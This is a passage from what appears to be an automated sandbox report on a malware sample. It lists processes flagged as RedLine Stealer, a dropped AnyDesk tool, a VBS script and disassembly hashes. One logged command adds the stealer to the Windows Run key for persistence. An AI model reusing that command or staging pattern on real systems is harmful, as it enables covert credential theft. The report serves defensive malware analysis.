                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\ProgramData\WinNet\embedded.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\ProgramData\WinNet\embedded.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff73bbf0000
                                                                                                                                                                                                                                                File size:12'371'456 bytes
                                                                                                                                                                                                                                                MD5 hash:DB408CB75C1D0DA769C19A6CBBE60D87
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2884514638.000001A0BAD00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_EXEembeddedinBATfile, Description: Yara detected EXE embedded in BAT file, Source: C:\ProgramData\WinNet\embedded.exe, Author: Joe Security
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 58%, ReversingLabs
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs"
                                                                                                                                                                                                                                                Imagebase:0x7ff750f20000
                                                                                                                                                                                                                                                File size:170'496 bytes
                                                                                                                                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff628e90000
                                                                                                                                                                                                                                                File size:77'312 bytes
                                                                                                                                                                                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:cmd.exe /c C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff618ed0000
                                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:cmd.exe /c C:\ProgramData\WinNet\p.vbs
                                                                                                                                                                                                                                                Imagebase:0x7ff618ed0000
                                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\ProgramData\WinNet\gg.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\WinNet\gg.exe"
                                                                                                                                                                                                                                                Imagebase:0x7a0000
                                                                                                                                                                                                                                                File size:304'128 bytes
                                                                                                                                                                                                                                                MD5 hash:20AB063F206EB8115FDE1479E05C245E
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000000.1640888434.00000000007A2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\ProgramData\WinNet\gg.exe, Author: Joe Security
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 71%, ReversingLabs
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                                Start time:13:31:57
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                Imagebase:0x230000
                                                                                                                                                                                                                                                File size:5'216'584 bytes
                                                                                                                                                                                                                                                MD5 hash:A21768190F3B9FEAE33AAEF660CB7A83
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                                Start time:13:31:57
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs"
                                                                                                                                                                                                                                                Imagebase:0x7ff750f20000
                                                                                                                                                                                                                                                File size:170'496 bytes
                                                                                                                                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                                Start time:13:31:58
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\ProgramData\WinNet\gg.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\WinNet\gg.exe"
                                                                                                                                                                                                                                                Imagebase:0xf20000
                                                                                                                                                                                                                                                File size:304'128 bytes
                                                                                                                                                                                                                                                MD5 hash:20AB063F206EB8115FDE1479E05C245E
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.1807448246.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                                Start time:13:31:59
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\WinNet\AnyDesk.exe" --local-service
                                                                                                                                                                                                                                                Imagebase:0x230000
                                                                                                                                                                                                                                                File size:5'216'584 bytes
                                                                                                                                                                                                                                                MD5 hash:A21768190F3B9FEAE33AAEF660CB7A83
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                                Start time:13:31:59
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\WinNet\AnyDesk.exe" --local-control
                                                                                                                                                                                                                                                Imagebase:0x230000
                                                                                                                                                                                                                                                File size:5'216'584 bytes
                                                                                                                                                                                                                                                MD5 hash:A21768190F3B9FEAE33AAEF660CB7A83
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                                Start time:13:32:05
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                                Imagebase:0x7ff6f0940000
                                                                                                                                                                                                                                                File size:71'680 bytes
                                                                                                                                                                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                                Start time:13:32:13
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\ProgramData\WinNet\gg.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\WinNet\gg.exe"
                                                                                                                                                                                                                                                Imagebase:0xc40000
                                                                                                                                                                                                                                                File size:304'128 bytes
                                                                                                                                                                                                                                                MD5 hash:20AB063F206EB8115FDE1479E05C245E
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.1935874670.0000000003185000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000018.00000002.1935874670.0000000003185000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                  Function 00000231DA96D448 Relevance: .8, Instructions: 802COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2888190135.00000231DA954000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000231DA954000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_231da954000_SysrI6zSkJ.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: cf2fe28fef598741c2ecf4e55fd315f86f7e88fc84d962f22dc4bae8e59b4267
                                                                                                                                                                                                                                                  • Instruction ID: ec914048efeee6c40e6461447132d3c7a294c18d2c54d32812e0c51300460574
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf2fe28fef598741c2ecf4e55fd315f86f7e88fc84d962f22dc4bae8e59b4267
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D424831618E0D8FDB9CEF5CC488BA9B7E0FF59300F180559D49AE7692CA39E951DB80
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 00000231DA96D7AB Relevance: .5, Instructions: 460COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2888190135.00000231DA954000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000231DA954000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_231da954000_SysrI6zSkJ.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d8b877085ef47692e568aa4d8d3fcbee17eef3d3e509e95cbe048a70e8427783
                                                                                                                                                                                                                                                  • Instruction ID: 259f88af11de79ea030a68b2ab5204b75637744fb6114e5f2053ed948b94fb8f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8b877085ef47692e568aa4d8d3fcbee17eef3d3e509e95cbe048a70e8427783
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CF16D31618E0D9FDBA8DB1CC489BA9B7E0FF59300F180559D89AE7292C635F951CB80
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 00000231DA96569C Relevance: .8, Instructions: 827COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2888190135.00000231DA954000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000231DA954000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_231da954000_SysrI6zSkJ.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 0b66ff16af40232d7f2436a78117914e1098167ff2c971068d68cfdf4187609c
                                                                                                                                                                                                                                                  • Instruction ID: 3b386a2087ab355427a5e5e6bdc4d8e2dfbac427dc081f858d4e6467390752c5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b66ff16af40232d7f2436a78117914e1098167ff2c971068d68cfdf4187609c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24520570618F0D9FDB88EF58C4C9B69B7E0FB68701F504A6D954AD32A2CB35E950CB81
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 00000231DA972328 Relevance: .8, Instructions: 773COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2888190135.00000231DA954000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000231DA954000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_231da954000_SysrI6zSkJ.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 23b44aa292820013d320316acf97590cd588a90dc143f171c35868205d26e301
                                                                                                                                                                                                                                                  • Instruction ID: 396404b12e7dfc10f69fee0f29e9f1d23d3261e14a42eea372a1fe45e2f5ebcd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23b44aa292820013d320316acf97590cd588a90dc143f171c35868205d26e301
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B427D30628E1D8FDFA8EB6CC4C8BA9B7E0FB69300F540559E44ED36D2CA35E9518B51
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 00000231DA965EEC Relevance: .3, Instructions: 280COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2888190135.00000231DA954000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000231DA954000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_231da954000_SysrI6zSkJ.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4f6e2d5081d89460c3dca1a952d53b67a908dd308cf6f5b21d6a8310c3104190
                                                                                                                                                                                                                                                  • Instruction ID: 1edd01ec318a4f22f5d1e7de47f030ad5a84b4ceb80ce55144c5bb86359a6600
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f6e2d5081d89460c3dca1a952d53b67a908dd308cf6f5b21d6a8310c3104190
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97A10930618E0D9FDB98EF5DC4C9A69B7E0FF68300F554959D58AD36A2CA34E950CB40
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 00000231DA997110 Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2888190135.00000231DA954000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000231DA954000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_231da954000_SysrI6zSkJ.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b1cb660ab3de78909866a30e2d998f022914bc6aac7eafa72df001fea3eae98d
                                                                                                                                                                                                                                                  • Instruction ID: 2a022ec071f5ebe160b7bbb4f2a2dc3bea76a37eb816e114dd9217cb0a595f27
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1cb660ab3de78909866a30e2d998f022914bc6aac7eafa72df001fea3eae98d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE418230514E0E9FDB98EF68C48D769B7E0FB19301F500959E44ED36D2EB39E9A18B81
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 00000231DA9584D4 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2888190135.00000231DA954000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000231DA954000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_231da954000_SysrI6zSkJ.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d073ea6415d0db3c17bdc8a98aebfe16329abf3a99ce1380e324cf6d63500e2d
                                                                                                                                                                                                                                                  • Instruction ID: 0fe003ddfb78b4236132ac02cb815330248546d61243316afa6e71af56ea792b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d073ea6415d0db3c17bdc8a98aebfe16329abf3a99ce1380e324cf6d63500e2d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C41442181CF848BE3198F5C9846BB6B3E4FB6D304F04970DE9CF91052DF71B5A68686
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 00000231DA975936 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2888190135.00000231DA954000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000231DA954000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_231da954000_SysrI6zSkJ.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d0eaa389417a297514ba406972abe5c67d5c474a303992de1aae04ac59a65431
                                                                                                                                                                                                                                                  • Instruction ID: 9958b54f824e97b8207f2f84bdb209cd73247e9e2d44aab12e8bd5be36d61b77
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0eaa389417a297514ba406972abe5c67d5c474a303992de1aae04ac59a65431
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2641E430608E0C8FDED8EF1DD085F6577E1EB69710F500A9DD48ED76A2DA36E8528B41
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 00000231DA96AF34 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2888190135.00000231DA954000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000231DA954000, based on PE: false
